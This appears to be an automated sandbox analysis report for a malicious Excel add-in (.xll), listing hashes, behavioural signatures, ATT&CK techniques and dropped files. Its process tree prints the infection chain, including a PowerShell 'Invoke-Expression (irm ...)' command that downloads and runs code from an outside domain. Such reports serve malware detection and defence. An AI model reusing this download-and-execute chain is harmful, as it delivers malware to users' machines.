Analysis

  • max time kernel
    100s
  • max time network
    126s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 19:13

General

  • Target

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll

  • Size

    12KB

  • MD5

    7eef05a09734d3716ab632ea88485d7b

  • SHA1

    b41e0f20958206601f27dd8ac7ba6ca1a704f62b

  • SHA256

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6

  • SHA512

    0b81df9eb1d4da5688ed7cbf1724c43aa24114a47e57ae781eb5f613de7f63ac7768b614492afdb3f9ec25a3029347acff8e5cdb091f95f34168bdc7d6a61f4d

  • SSDEEP

    192:vZZL29RBzDzeobchBj8JONlONKyQru+rEPEjr7Ahy:H29jnbcvYJO2au+vr7Cy

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5016
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2556

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FSXOS7P2\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hovmmd5b.a0r.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll
    Filesize

    12KB

    MD5

    7eef05a09734d3716ab632ea88485d7b

    SHA1

    b41e0f20958206601f27dd8ac7ba6ca1a704f62b

    SHA256

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6

    SHA512

    0b81df9eb1d4da5688ed7cbf1724c43aa24114a47e57ae781eb5f613de7f63ac7768b614492afdb3f9ec25a3029347acff8e5cdb091f95f34168bdc7d6a61f4d

  • memory/2556-59-0x0000000005C40000-0x0000000005C8C000-memory.dmp
    Filesize

    304KB

  • memory/2556-58-0x0000000005BF0000-0x0000000005C0E000-memory.dmp
    Filesize

    120KB

  • memory/2556-57-0x0000000005790000-0x0000000005AE7000-memory.dmp
    Filesize

    3.3MB

  • memory/2556-60-0x0000000007490000-0x0000000007B0A000-memory.dmp
    Filesize

    6.5MB

  • memory/2556-48-0x00000000056C0000-0x0000000005726000-memory.dmp
    Filesize

    408KB

  • memory/2556-47-0x0000000005650000-0x00000000056B6000-memory.dmp
    Filesize

    408KB

  • memory/2556-46-0x0000000004D50000-0x0000000004D72000-memory.dmp
    Filesize

    136KB

  • memory/2556-45-0x0000000004DF0000-0x000000000541A000-memory.dmp
    Filesize

    6.2MB

  • memory/2556-44-0x0000000004780000-0x00000000047B6000-memory.dmp
    Filesize

    216KB

  • memory/2556-61-0x00000000060F0000-0x000000000610A000-memory.dmp
    Filesize

    104KB

  • memory/5016-11-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-9-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-17-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-19-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-18-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-20-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-15-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-14-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-13-0x00007FF8660F0000-0x00007FF866100000-memory.dmp
    Filesize

    64KB

  • memory/5016-7-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-12-0x00007FF8660F0000-0x00007FF866100000-memory.dmp
    Filesize

    64KB

  • memory/5016-0-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-10-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-16-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-8-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-6-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-1-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-4-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-5-0x00007FF8A89C3000-0x00007FF8A89C4000-memory.dmp
    Filesize

    4KB

  • memory/5016-3-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-2-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-68-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB

  • memory/5016-84-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-85-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-87-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-86-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp
    Filesize

    64KB

  • memory/5016-88-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp
    Filesize

    2.0MB